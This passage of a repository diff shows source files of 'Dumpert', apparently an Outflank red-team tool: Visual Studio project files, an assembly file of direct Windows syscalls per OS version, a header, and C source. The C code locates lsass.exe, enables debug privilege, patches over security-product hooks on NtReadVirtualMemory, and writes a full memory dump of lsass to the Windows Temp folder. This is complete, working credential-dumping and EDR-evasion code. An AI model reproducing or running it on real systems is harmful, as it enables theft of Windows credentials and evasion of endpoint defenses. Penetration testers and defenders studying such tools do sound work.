<Optimization>MaxSpeed</Optimization>
<FunctionLevelLinking>true</FunctionLevelLinking>
<IntrinsicFunctions>true</IntrinsicFunctions>
<SDLCheck>true</SDLCheck>
</ClCompile>
<Link>
<EnableCOMDATFolding>true</EnableCOMDATFolding>
<OptimizeReferences>true</OptimizeReferences>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<ClCompile>
<WarningLevel>Level3</WarningLevel>
<Optimization>MaxSpeed</Optimization>
<FunctionLevelLinking>true</FunctionLevelLinking>
<IntrinsicFunctions>true</IntrinsicFunctions>
<SDLCheck>true</SDLCheck>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
</ClCompile>
<Link>
<EnableCOMDATFolding>true</EnableCOMDATFolding>
<OptimizeReferences>true</OptimizeReferences>
<GenerateDebugInformation>false</GenerateDebugInformation>
</Link>
</ItemDefinitionGroup>
<ItemGroup>
<ClCompile Include="Dumpert.c" />
</ItemGroup>
<ItemGroup>
<ClInclude Include="Dumpert.h" />
</ItemGroup>
<ItemGroup>
<MASM Include="Syscalls.asm" />
</ItemGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
<ImportGroup Label="ExtensionTargets">
<Import Project="$(VCTargetsPath)\BuildCustomizations\masm.targets" />
</ImportGroup>
</Project>
Dumpert-DLL/Outflank-Dumpert-DLL/Outflank-Dumpert-DLL.vcxproj.filters
Executable
+32
View File
@@ -0,0 +1,32 @@
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup>
<Filter Include="Source Files">
<UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
<Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
</Filter>
<Filter Include="Header Files">
<UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
<Extensions>h;hh;hpp;hxx;hm;inl;inc;xsd</Extensions>
</Filter>
<Filter Include="Resource Files">
<UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
<Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
</Filter>
</ItemGroup>
<ItemGroup>
<ClCompile Include="Dumpert.c">
<Filter>Source Files</Filter>
</ClCompile>
</ItemGroup>
<ItemGroup>
<ClInclude Include="Dumpert.h">
<Filter>Header Files</Filter>
</ClInclude>
</ItemGroup>
<ItemGroup>
<MASM Include="Syscalls.asm">
<Filter>Source Files</Filter>
</MASM>
</ItemGroup>
</Project>
Dumpert-DLL/Outflank-Dumpert-DLL/Outflank-Dumpert-DLL.vcxproj.user
Executable
+8
View File
@@ -0,0 +1,8 @@
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="14.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<LocalDebuggerCommand>C:\Windows\System32\Rundll32.exe</LocalDebuggerCommand>
<LocalDebuggerCommandArguments>C:\Outflank\Development\Outflank-Dumpert-DLL\x64\Debug\Outflank-Dumpert-DLL.dll,Dump</LocalDebuggerCommandArguments>
<DebuggerFlavor>WindowsLocalDebugger</DebuggerFlavor>
</PropertyGroup>
</Project>
Dumpert-DLL/Outflank-Dumpert-DLL/Syscalls.asm
Executable
+237
View File
@@ -0,0 +1,237 @@
.code
; Reference: https://j00ru.vexillium.org/syscalls/nt/64/
; Windows 7 SP1 / Server 2008 R2 specific syscalls
ZwOpenProcess7SP1 proc
mov r10, rcx
mov eax, 23h
syscall
ret
ZwOpenProcess7SP1 endp
ZwClose7SP1 proc
mov r10, rcx
mov eax, 0Ch
syscall
ret
ZwClose7SP1 endp
ZwWriteVirtualMemory7SP1 proc
mov r10, rcx
mov eax, 37h
syscall
ret
ZwWriteVirtualMemory7SP1 endp
ZwProtectVirtualMemory7SP1 proc
mov r10, rcx
mov eax, 4Dh
syscall
ret
ZwProtectVirtualMemory7SP1 endp
ZwQuerySystemInformation7SP1 proc
mov r10, rcx
mov eax, 33h
syscall
ret
ZwQuerySystemInformation7SP1 endp
NtAllocateVirtualMemory7SP1 proc
mov r10, rcx
mov eax, 15h
syscall
ret
NtAllocateVirtualMemory7SP1 endp
NtFreeVirtualMemory7SP1 proc
mov r10, rcx
mov eax, 1Bh
syscall
ret
NtFreeVirtualMemory7SP1 endp
NtCreateFile7SP1 proc
mov r10, rcx
mov eax, 52h
syscall
ret
NtCreateFile7SP1 endp
; Windows 8 / Server 2012 specific syscalls
ZwOpenProcess80 proc
mov r10, rcx
mov eax, 24h
syscall
ret
ZwOpenProcess80 endp
ZwClose80 proc
mov r10, rcx
mov eax, 0Dh
syscall
ret
ZwClose80 endp
ZwWriteVirtualMemory80 proc
mov r10, rcx
mov eax, 38h
syscall
ret
ZwWriteVirtualMemory80 endp
ZwProtectVirtualMemory80 proc
mov r10, rcx
mov eax, 4Eh
syscall
ret
ZwProtectVirtualMemory80 endp
ZwQuerySystemInformation80 proc
mov r10, rcx
mov eax, 34h
syscall
ret
ZwQuerySystemInformation80 endp
NtAllocateVirtualMemory80 proc
mov r10, rcx
mov eax, 16h
syscall
ret
NtAllocateVirtualMemory80 endp
NtFreeVirtualMemory80 proc
mov r10, rcx
mov eax, 1Ch
syscall
ret
NtFreeVirtualMemory80 endp
NtCreateFile80 proc
mov r10, rcx
mov eax, 53h
syscall
ret
NtCreateFile80 endp
; Windows 8.1 / Server 2012 R2 specific syscalls
ZwOpenProcess81 proc
mov r10, rcx
mov eax, 25h
syscall
ret
ZwOpenProcess81 endp
ZwClose81 proc
mov r10, rcx
mov eax, 0Eh
syscall
ret
ZwClose81 endp
ZwWriteVirtualMemory81 proc
mov r10, rcx
mov eax, 39h
syscall
ret
ZwWriteVirtualMemory81 endp
ZwProtectVirtualMemory81 proc
mov r10, rcx
mov eax, 4Fh
syscall
ret
ZwProtectVirtualMemory81 endp
ZwQuerySystemInformation81 proc
mov r10, rcx
mov eax, 35h
syscall
ret
ZwQuerySystemInformation81 endp
NtAllocateVirtualMemory81 proc
mov r10, rcx
mov eax, 17h
syscall
ret
NtAllocateVirtualMemory81 endp
NtFreeVirtualMemory81 proc
mov r10, rcx
mov eax, 1Dh
syscall
ret
NtFreeVirtualMemory81 endp
NtCreateFile81 proc
mov r10, rcx
mov eax, 54h
syscall
ret
NtCreateFile81 endp
; Windows 10 / Server 2016 specific syscalls
ZwOpenProcess10 proc
mov r10, rcx
mov eax, 26h
syscall
ret
ZwOpenProcess10 endp
ZwClose10 proc
mov r10, rcx
mov eax, 0Fh
syscall
ret
ZwClose10 endp
ZwWriteVirtualMemory10 proc
mov r10, rcx
mov eax, 3Ah
syscall
ret
ZwWriteVirtualMemory10 endp
ZwProtectVirtualMemory10 proc
mov r10, rcx
mov eax, 50h
syscall
ret
ZwProtectVirtualMemory10 endp
ZwQuerySystemInformation10 proc
mov r10, rcx
mov eax, 36h
syscall
ret
ZwQuerySystemInformation10 endp
NtAllocateVirtualMemory10 proc
mov r10, rcx
mov eax, 18h
syscall
ret
NtAllocateVirtualMemory10 endp
NtFreeVirtualMemory10 proc
mov r10, rcx
mov eax, 1Eh
syscall
ret
NtFreeVirtualMemory10 endp
NtCreateFile10 proc
mov r10, rcx
mov eax, 55h
syscall
ret
NtCreateFile10 endp
end
Dumpert/Outflank-Dumpert.sln
Executable
+28
View File
@@ -0,0 +1,28 @@
Microsoft Visual Studio Solution File, Format Version 12.00
# Visual Studio Express 14 for Windows Desktop
VisualStudioVersion = 14.0.25420.1
MinimumVisualStudioVersion = 10.0.40219.1
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "Outflank-Dumpert", "Outflank-Dumpert\Outflank-Dumpert.vcxproj", "{C7A0003B-98DC-4D57-8F09-5B90AAEFBDF4}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|x64 = Debug|x64
Debug|x86 = Debug|x86
Release|x64 = Release|x64
Release|x86 = Release|x86
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{C7A0003B-98DC-4D57-8F09-5B90AAEFBDF4}.Debug|x64.ActiveCfg = Debug|x64
{C7A0003B-98DC-4D57-8F09-5B90AAEFBDF4}.Debug|x64.Build.0 = Debug|x64
{C7A0003B-98DC-4D57-8F09-5B90AAEFBDF4}.Debug|x86.ActiveCfg = Debug|Win32
{C7A0003B-98DC-4D57-8F09-5B90AAEFBDF4}.Debug|x86.Build.0 = Debug|Win32
{C7A0003B-98DC-4D57-8F09-5B90AAEFBDF4}.Release|x64.ActiveCfg = Release|x64
{C7A0003B-98DC-4D57-8F09-5B90AAEFBDF4}.Release|x64.Build.0 = Release|x64
{C7A0003B-98DC-4D57-8F09-5B90AAEFBDF4}.Release|x86.ActiveCfg = Release|Win32
{C7A0003B-98DC-4D57-8F09-5B90AAEFBDF4}.Release|x86.Build.0 = Release|Win32
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal
Dumpert/Outflank-Dumpert/Dumpert.c
Executable
+354
View File
@@ -0,0 +1,354 @@
#undef _UNICODE
#define _UNICODE
#undef UNICODE
#define UNICODE
#include <Windows.h>
#include <stdio.h>
#include "Dumpert.h"
#include <DbgHelp.h>
#pragma comment (lib, "Dbghelp.lib")
BOOL Unhook_NativeAPI(IN PWIN_VER_INFO pWinVerInfo) {
BYTE AssemblyBytes[] = {0x4C, 0x8B, 0xD1, 0xB8, 0xFF};
if (_wcsicmp(pWinVerInfo->chOSMajorMinor, L"10.0") == 0) {
AssemblyBytes[4] = pWinVerInfo->SystemCall;
ZwWriteVirtualMemory = &ZwWriteVirtualMemory10;
ZwProtectVirtualMemory = &ZwProtectVirtualMemory10;
}
else if (_wcsicmp(pWinVerInfo->chOSMajorMinor, L"6.1") == 0 && pWinVerInfo->dwBuildNumber == 7601) {
AssemblyBytes[4] = pWinVerInfo->SystemCall;
ZwWriteVirtualMemory = &ZwWriteVirtualMemory7SP1;
ZwProtectVirtualMemory = &ZwProtectVirtualMemory7SP1;
}
else if (_wcsicmp(pWinVerInfo->chOSMajorMinor, L"6.2") == 0) {
AssemblyBytes[4] = pWinVerInfo->SystemCall;
ZwWriteVirtualMemory = &ZwWriteVirtualMemory80;
ZwProtectVirtualMemory = &ZwProtectVirtualMemory80;
}
else if (_wcsicmp(pWinVerInfo->chOSMajorMinor, L"6.3") == 0) {
AssemblyBytes[4] = pWinVerInfo->SystemCall;
ZwWriteVirtualMemory = &ZwWriteVirtualMemory81;
ZwProtectVirtualMemory = &ZwProtectVirtualMemory81;
}
else {
return FALSE;
}
LPVOID lpProcAddress = GetProcAddress(LoadLibrary(L"ntdll.dll"), pWinVerInfo->lpApiCall);
printf(" [+] %s function pointer at: 0x%p\n", pWinVerInfo->lpApiCall, lpProcAddress);
printf(" [+] %s System call nr is: 0x%x\n", pWinVerInfo->lpApiCall, AssemblyBytes[4]);
printf(" [+] Unhooking %s.\n", pWinVerInfo->lpApiCall);
ULONG OldProtection, NewProtection;
SIZE_T uSize = 10;
NTSTATUS status = ZwProtectVirtualMemory(GetCurrentProcess(), &lpProcAddress, &uSize, PAGE_EXECUTE_READWRITE, &OldProtection);
if (status != STATUS_SUCCESS) {
wprintf(L" [!] ZwProtectVirtualMemory failed.\n");
return FALSE;
}
status = ZwWriteVirtualMemory(GetCurrentProcess(), lpProcAddress, (PVOID)AssemblyBytes, sizeof(AssemblyBytes), NULL);
if (status != STATUS_SUCCESS) {
wprintf(L" [!] ZwWriteVirtualMemory failed.\n");
return FALSE;
}
status = ZwProtectVirtualMemory(GetCurrentProcess(), &lpProcAddress, &uSize, OldProtection, &NewProtection);
if (status != STATUS_SUCCESS) {
wprintf(L" [!] ZwProtectVirtualMemory failed.\n");
return FALSE;
}
return TRUE;
}
BOOL GetPID(IN PWIN_VER_INFO pWinVerInfo) {
pWinVerInfo->hTargetPID = NULL;
if (_wcsicmp(pWinVerInfo->chOSMajorMinor, L"10.0") == 0) {
ZwQuerySystemInformation = &ZwQuerySystemInformation10;
NtAllocateVirtualMemory = &NtAllocateVirtualMemory10;
NtFreeVirtualMemory = &NtFreeVirtualMemory10;
}
else if (_wcsicmp(pWinVerInfo->chOSMajorMinor, L"6.1") == 0 && pWinVerInfo->dwBuildNumber == 7601) {
ZwQuerySystemInformation = &ZwQuerySystemInformation7SP1;
NtAllocateVirtualMemory = &NtAllocateVirtualMemory7SP1;
NtFreeVirtualMemory = &NtFreeVirtualMemory7SP1;
}
else if (_wcsicmp(pWinVerInfo->chOSMajorMinor, L"6.2") == 0) {
ZwQuerySystemInformation = &ZwQuerySystemInformation80;
NtAllocateVirtualMemory = &NtAllocateVirtualMemory80;
NtFreeVirtualMemory = &NtFreeVirtualMemory80;
}
else if (_wcsicmp(pWinVerInfo->chOSMajorMinor, L"6.3") == 0) {
ZwQuerySystemInformation = &ZwQuerySystemInformation81;
NtAllocateVirtualMemory = &NtAllocateVirtualMemory81;
NtFreeVirtualMemory = &NtFreeVirtualMemory81;
}
else {
return FALSE;
}
ULONG uReturnLength = 0;
NTSTATUS status = ZwQuerySystemInformation(SystemProcessInformation, 0, 0, &uReturnLength);
if (!status == 0xc0000004) {
return FALSE;
}
LPVOID pBuffer = NULL;
SIZE_T uSize = uReturnLength;
status = NtAllocateVirtualMemory(GetCurrentProcess(), &pBuffer, 0, &uSize, MEM_COMMIT, PAGE_READWRITE);
if (status != 0) {
return FALSE;
}
status = ZwQuerySystemInformation(SystemProcessInformation, pBuffer, uReturnLength, &uReturnLength);
if (status != 0) {
return FALSE;
}
_RtlEqualUnicodeString RtlEqualUnicodeString = (_RtlEqualUnicodeString)
GetProcAddress(GetModuleHandle(L"ntdll.dll"), "RtlEqualUnicodeString");
if (RtlEqualUnicodeString == NULL) {
return FALSE;
}
PSYSTEM_PROCESSES pProcInfo = (PSYSTEM_PROCESSES)pBuffer;
do {
if (RtlEqualUnicodeString(&pProcInfo->ProcessName, &pWinVerInfo->ProcName, TRUE)) {
pWinVerInfo->hTargetPID = pProcInfo->ProcessId;
break;
}
pProcInfo = (PSYSTEM_PROCESSES)(((LPBYTE)pProcInfo) + pProcInfo->NextEntryDelta);
} while (pProcInfo);
status = NtFreeVirtualMemory(GetCurrentProcess(), &pBuffer, &uSize, MEM_RELEASE);
if (pWinVerInfo->hTargetPID == NULL) {
return FALSE;
}
return TRUE;
}
BOOL IsElevated() {
BOOL fRet = FALSE;
HANDLE hToken = NULL;
if (OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY, &hToken)) {
TOKEN_ELEVATION Elevation = { 0 };
DWORD cbSize = sizeof(TOKEN_ELEVATION);
if (GetTokenInformation(hToken, TokenElevation, &Elevation, sizeof(Elevation), &cbSize)) {
fRet = Elevation.TokenIsElevated;
}
}
if (hToken) {
CloseHandle(hToken);
}
return fRet;
}
BOOL SetDebugPrivilege() {
HANDLE hToken = NULL;
TOKEN_PRIVILEGES TokenPrivileges = { 0 };
if (!OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY | TOKEN_ADJUST_PRIVILEGES, &hToken)) {
return FALSE;
}
TokenPrivileges.PrivilegeCount = 1;
TokenPrivileges.Privileges[0].Attributes = TRUE ? SE_PRIVILEGE_ENABLED : 0;
LPWSTR lpwPriv = L"SeDebugPrivilege";
if (!LookupPrivilegeValueW(NULL, (LPCWSTR)lpwPriv, &TokenPrivileges.Privileges[0].Luid)) {
CloseHandle(hToken);
return FALSE;
}
if (!AdjustTokenPrivileges(hToken, FALSE, &TokenPrivileges, sizeof(TOKEN_PRIVILEGES), NULL, NULL)) {
CloseHandle(hToken);
return FALSE;
}
CloseHandle(hToken);
return TRUE;
}
int wmain(int argc, wchar_t* argv[]) {
wprintf(L" ________ __ _____.__ __ \n");
wprintf(L" \\_____ \\ __ ___/ |__/ ____\\ | _____ ____ | | __ \n");
wprintf(L" / | \\| | \\ __\\ __\\| | \\__ \\ / \\| |/ / \n");
wprintf(L" / | \\ | /| | | | | |__/ __ \\| | \\ < \n");
wprintf(L" \\_______ /____/ |__| |__| |____(____ /___| /__|_ \\ \n");
wprintf(L" \\/ \\/ \\/ \\/ \n");
wprintf(L" Dumpert \n");
wprintf(L" By Cneeliz @Outflank 2019 \n\n");
LPCWSTR lpwProcName = L"lsass.exe";
if (sizeof(LPVOID) != 8) {
wprintf(L"[!] Sorry, this tool only works on a x64 version of Windows.\n");
exit(1);
}
if (!IsElevated()) {
wprintf(L"[!] You need elevated privileges to run this tool!\n");
exit(1);
}
SetDebugPrivilege();
PWIN_VER_INFO pWinVerInfo = (PWIN_VER_INFO)calloc(1, sizeof(WIN_VER_INFO));
// First set OS Version/Architecture specific values
OSVERSIONINFOEXW osInfo;
LPWSTR lpOSVersion;
osInfo.dwOSVersionInfoSize = sizeof(osInfo);
_RtlGetVersion RtlGetVersion = (_RtlGetVersion)
GetProcAddress(GetModuleHandle(L"ntdll.dll"), "RtlGetVersion");
if (RtlGetVersion == NULL) {
return FALSE;
}
wprintf(L"[1] Checking OS version details:\n");
RtlGetVersion(&osInfo);
swprintf_s(pWinVerInfo->chOSMajorMinor, _countof(pWinVerInfo->chOSMajorMinor), L"%u.%u", osInfo.dwMajorVersion, osInfo.dwMinorVersion);
pWinVerInfo->dwBuildNumber = osInfo.dwBuildNumber;
// Now create os/build specific syscall function pointers.
if (_wcsicmp(pWinVerInfo->chOSMajorMinor, L"10.0") == 0) {
lpOSVersion = L"10 or Server 2016";
wprintf(L" [+] Operating System is Windows %ls, build number %d\n", lpOSVersion, pWinVerInfo->dwBuildNumber);
wprintf(L" [+] Mapping version specific System calls.\n");
ZwOpenProcess = &ZwOpenProcess10;
NtCreateFile = &NtCreateFile10;
ZwClose = &ZwClose10;
pWinVerInfo->SystemCall = 0x3F;
}
else if (_wcsicmp(pWinVerInfo->chOSMajorMinor, L"6.1") == 0 && osInfo.dwBuildNumber == 7601) {
lpOSVersion = L"7 SP1 or Server 2008 R2";
wprintf(L" [+] Operating System is Windows %ls, build number %d\n", lpOSVersion, pWinVerInfo->dwBuildNumber);
wprintf(L" [+] Mapping version specific System calls.\n");
ZwOpenProcess = &ZwOpenProcess7SP1;
NtCreateFile = &NtCreateFile7SP1;
ZwClose = &ZwClose7SP1;
pWinVerInfo->SystemCall = 0x3C;
}
else if (_wcsicmp(pWinVerInfo->chOSMajorMinor, L"6.2") == 0) {
lpOSVersion = L"8 or Server 2012";
wprintf(L" [+] Operating System is Windows %ls, build number %d\n", lpOSVersion, pWinVerInfo->dwBuildNumber);
wprintf(L" [+] Mapping version specific System calls.\n");
ZwOpenProcess = &ZwOpenProcess80;
NtCreateFile = &NtCreateFile80;
ZwClose = &ZwClose80;
pWinVerInfo->SystemCall = 0x3D;
}
else if (_wcsicmp(pWinVerInfo->chOSMajorMinor, L"6.3") == 0) {
lpOSVersion = L"8.1 or Server 2012 R2";
wprintf(L" [+] Operating System is Windows %ls, build number %d\n", lpOSVersion, pWinVerInfo->dwBuildNumber);
wprintf(L" [+] Mapping version specific System calls.\n");
ZwOpenProcess = &ZwOpenProcess81;
NtCreateFile = &NtCreateFile81;
ZwClose = &ZwClose81;
pWinVerInfo->SystemCall = 0x3E;
}
else {
wprintf(L" [!] OS Version not supported.\n\n");
exit(1);
}
wprintf(L"[2] Checking Process details:\n");
_RtlInitUnicodeString RtlInitUnicodeString = (_RtlInitUnicodeString)
GetProcAddress(GetModuleHandle(L"ntdll.dll"), "RtlInitUnicodeString");
if (RtlInitUnicodeString == NULL) {
return FALSE;
}
RtlInitUnicodeString(&pWinVerInfo->ProcName, lpwProcName);
if (!GetPID(pWinVerInfo)) {
wprintf(L" [!] Enumerating process failed.\n");
exit(1);
}
wprintf(L" [+] Process ID of %wZ is: %lld\n", pWinVerInfo->ProcName, (ULONG64)pWinVerInfo->hTargetPID);
pWinVerInfo->lpApiCall = "NtReadVirtualMemory";
if (!Unhook_NativeAPI(pWinVerInfo)) {
printf(" [!] Unhooking %s failed.\n", pWinVerInfo->lpApiCall);
exit(1);
}
wprintf(L"[3] Create memorydump file:\n");
wprintf(L" [+] Open a process handle.\n");
HANDLE hProcess = NULL;
OBJECT_ATTRIBUTES ObjectAttributes;
InitializeObjectAttributes(&ObjectAttributes, NULL, 0, NULL, NULL);
CLIENT_ID uPid = { 0 };
uPid.UniqueProcess = pWinVerInfo->hTargetPID;
uPid.UniqueThread = (HANDLE)0;
NTSTATUS status = ZwOpenProcess(&hProcess, PROCESS_ALL_ACCESS, &ObjectAttributes, &uPid);
if (hProcess == NULL) {
wprintf(L" [!] Failed to get processhandle.\n");
exit(1);
}
WCHAR chDmpFile[MAX_PATH] = L"\\??\\";
WCHAR chWinPath[MAX_PATH];
GetWindowsDirectory(chWinPath, MAX_PATH);
wcscat_s(chDmpFile, sizeof(chDmpFile) / sizeof(wchar_t), chWinPath);
wcscat_s(chDmpFile, sizeof(chDmpFile) / sizeof(wchar_t), L"\\Temp\\dumpert.dmp");
UNICODE_STRING uFileName;
RtlInitUnicodeString(&uFileName, chDmpFile);
wprintf(L" [+] Dump %wZ memory to: %wZ\n", pWinVerInfo->ProcName, uFileName);
HANDLE hDmpFile = NULL;
IO_STATUS_BLOCK IoStatusBlock;
ZeroMemory(&IoStatusBlock, sizeof(IoStatusBlock));
OBJECT_ATTRIBUTES FileObjectAttributes;
InitializeObjectAttributes(&FileObjectAttributes, &uFileName, OBJ_CASE_INSENSITIVE, NULL, NULL);
// Open input file for writing, overwrite existing file.
status = NtCreateFile(&hDmpFile, FILE_GENERIC_WRITE, &FileObjectAttributes, &IoStatusBlock, 0,
FILE_ATTRIBUTE_NORMAL, FILE_SHARE_WRITE, FILE_OVERWRITE_IF, FILE_SYNCHRONOUS_IO_NONALERT, NULL, 0);
if (hDmpFile == INVALID_HANDLE_VALUE) {
wprintf(L" [!] Failed to create dumpfile.\n");
ZwClose(hProcess);
exit(1);
}
DWORD dwTargetPID = GetProcessId(hProcess);
BOOL Success = MiniDumpWriteDump(hProcess,
dwTargetPID,
hDmpFile,
MiniDumpWithFullMemory,
NULL,
NULL,
NULL);
if ((!Success))
{
wprintf(L" [!] Failed to create minidump, error code: %x\n", GetLastError());
}
else {
wprintf(L" [+] Dump succesful.\n");
}
ZwClose(hDmpFile);
ZwClose(hProcess);
return 0;
}
Dumpert/Outflank-Dumpert/Dumpert.h
Executable
+209
View File
@@ -0,0 +1,209 @@
#pragma once
#include <Windows.h>
#define STATUS_SUCCESS 0
#define OBJ_CASE_INSENSITIVE 0x00000040L
#define FILE_OVERWRITE_IF 0x00000005
#define FILE_SYNCHRONOUS_IO_NONALERT 0x00000020
typedef LONG KPRIORITY;
#define InitializeObjectAttributes( i, o, a, r, s ) { \
(i)->Length = sizeof( OBJECT_ATTRIBUTES ); \
(i)->RootDirectory = r; \
(i)->Attributes = a; \
(i)->ObjectName = o; \
(i)->SecurityDescriptor = s; \
(i)->SecurityQualityOfService = NULL; \
}
typedef struct _UNICODE_STRING {
USHORT Length;
USHORT MaximumLength;
PWSTR Buffer;
} UNICODE_STRING, *PUNICODE_STRING;
typedef const UNICODE_STRING* PCUNICODE_STRING;
typedef struct _WIN_VER_INFO {
WCHAR chOSMajorMinor[8];
DWORD dwBuildNumber;
UNICODE_STRING ProcName;
HANDLE hTargetPID;
LPCSTR lpApiCall;
INT SystemCall;
} WIN_VER_INFO, *PWIN_VER_INFO;
typedef struct _OBJECT_ATTRIBUTES {
ULONG Length;
HANDLE RootDirectory;
PUNICODE_STRING ObjectName;
ULONG Attributes;
PVOID SecurityDescriptor;
PVOID SecurityQualityOfService;
} OBJECT_ATTRIBUTES, *POBJECT_ATTRIBUTES;
typedef struct _CLIENT_ID {
HANDLE UniqueProcess;
HANDLE UniqueThread;
} CLIENT_ID, *PCLIENT_ID;
typedef enum _SYSTEM_INFORMATION_CLASS {
SystemBasicInformation,
SystemProcessorInformation,
SystemPerformanceInformation,
SystemTimeOfDayInformation,
SystemPathInformation,
SystemProcessInformation,
SystemCallCountInformation,
SystemDeviceInformation,
SystemProcessorPerformanceInformation,
SystemFlagsInformation,
SystemCallTimeInformation,
SystemModuleInformation
} SYSTEM_INFORMATION_CLASS, *PSYSTEM_INFORMATION_CLASS;
typedef struct _SYSTEM_PROCESSES {
ULONG NextEntryDelta;
ULONG ThreadCount;
ULONG Reserved1[6];
LARGE_INTEGER CreateTime;
LARGE_INTEGER UserTime;
LARGE_INTEGER KernelTime;
UNICODE_STRING ProcessName;
KPRIORITY BasePriority;
HANDLE ProcessId;
HANDLE InheritedFromProcessId;
} SYSTEM_PROCESSES, *PSYSTEM_PROCESSES;
typedef struct _IO_STATUS_BLOCK
{
union
{
LONG Status;
PVOID Pointer;
};
ULONG Information;
} IO_STATUS_BLOCK, *PIO_STATUS_BLOCK;
// Windows 7 SP1 / Server 2008 R2 specific Syscalls
EXTERN_C NTSTATUS NtAllocateVirtualMemory7SP1(HANDLE ProcessHandle, PVOID *BaseAddress, ULONG_PTR ZeroBits, PSIZE_T RegionSize, ULONG AllocationType, ULONG Protect);
EXTERN_C NTSTATUS NtFreeVirtualMemory7SP1(HANDLE ProcessHandle, PVOID *BaseAddress, IN OUT PSIZE_T RegionSize, ULONG FreeType);
EXTERN_C NTSTATUS ZwOpenProcess7SP1(PHANDLE ProcessHandle, ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes, PCLIENT_ID ClientId);
EXTERN_C NTSTATUS ZwClose7SP1(IN HANDLE KeyHandle);
EXTERN_C NTSTATUS ZwWriteVirtualMemory7SP1(HANDLE hProcess, PVOID lpBaseAddress, PVOID lpBuffer, SIZE_T NumberOfBytesToRead, PSIZE_T NumberOfBytesRead);
EXTERN_C NTSTATUS ZwProtectVirtualMemory7SP1(IN HANDLE ProcessHandle, IN PVOID* BaseAddress, IN SIZE_T* NumberOfBytesToProtect, IN ULONG NewAccessProtection, OUT PULONG OldAccessProtection);
EXTERN_C NTSTATUS WINAPI ZwQuerySystemInformation7SP1(SYSTEM_INFORMATION_CLASS SystemInformationClass, PVOID SystemInformation, ULONG SystemInformationLength, PULONG ReturnLength);
EXTERN_C NTSTATUS NtCreateFile7SP1(PHANDLE FileHandle, ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes, PIO_STATUS_BLOCK IoStatusBlock, PLARGE_INTEGER AllocationSize, ULONG FileAttributes, ULONG ShareAccess, ULONG CreateDisposition, ULONG CreateOptions, PVOID EaBuffer, ULONG EaLength);
// Windows 8 / Server 2012 specific Syscalls
EXTERN_C NTSTATUS NtAllocateVirtualMemory80(HANDLE ProcessHandle, PVOID *BaseAddress, ULONG_PTR ZeroBits, PSIZE_T RegionSize, ULONG AllocationType, ULONG Protect);
EXTERN_C NTSTATUS NtFreeVirtualMemory80(HANDLE ProcessHandle, PVOID *BaseAddress, IN OUT PSIZE_T RegionSize, ULONG FreeType);
EXTERN_C NTSTATUS ZwOpenProcess80(PHANDLE ProcessHandle, ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes, PCLIENT_ID ClientId);
EXTERN_C NTSTATUS ZwClose80(IN HANDLE KeyHandle);
EXTERN_C NTSTATUS ZwWriteVirtualMemory80(HANDLE hProcess, PVOID lpBaseAddress, PVOID lpBuffer, SIZE_T NumberOfBytesToRead, PSIZE_T NumberOfBytesRead);
EXTERN_C NTSTATUS ZwProtectVirtualMemory80(IN HANDLE ProcessHandle, IN PVOID* BaseAddress, IN SIZE_T* NumberOfBytesToProtect, IN ULONG NewAccessProtection, OUT PULONG OldAccessProtection);
EXTERN_C NTSTATUS WINAPI ZwQuerySystemInformation80(SYSTEM_INFORMATION_CLASS SystemInformationClass, PVOID SystemInformation, ULONG SystemInformationLength, PULONG ReturnLength);
EXTERN_C NTSTATUS NtCreateFile80(PHANDLE FileHandle, ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes, PIO_STATUS_BLOCK IoStatusBlock, PLARGE_INTEGER AllocationSize, ULONG FileAttributes, ULONG ShareAccess, ULONG CreateDisposition, ULONG CreateOptions, PVOID EaBuffer, ULONG EaLength);
// Windows 8.1 / Server 2012 R2 specific Syscalls
EXTERN_C NTSTATUS NtAllocateVirtualMemory81(HANDLE ProcessHandle, PVOID *BaseAddress, ULONG_PTR ZeroBits, PSIZE_T RegionSize, ULONG AllocationType, ULONG Protect);
EXTERN_C NTSTATUS NtFreeVirtualMemory81(HANDLE ProcessHandle, PVOID *BaseAddress, IN OUT PSIZE_T RegionSize, ULONG FreeType);
EXTERN_C NTSTATUS ZwOpenProcess81(PHANDLE ProcessHandle, ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes, PCLIENT_ID ClientId);
EXTERN_C NTSTATUS ZwClose81(IN HANDLE KeyHandle);
EXTERN_C NTSTATUS ZwWriteVirtualMemory81(HANDLE hProcess, PVOID lpBaseAddress, PVOID lpBuffer, SIZE_T NumberOfBytesToRead, PSIZE_T NumberOfBytesRead);
EXTERN_C NTSTATUS ZwProtectVirtualMemory81(IN HANDLE ProcessHandle, IN PVOID* BaseAddress, IN SIZE_T* NumberOfBytesToProtect, IN ULONG NewAccessProtection, OUT PULONG OldAccessProtection);
EXTERN_C NTSTATUS WINAPI ZwQuerySystemInformation81(SYSTEM_INFORMATION_CLASS SystemInformationClass, PVOID SystemInformation, ULONG SystemInformationLength, PULONG ReturnLength);
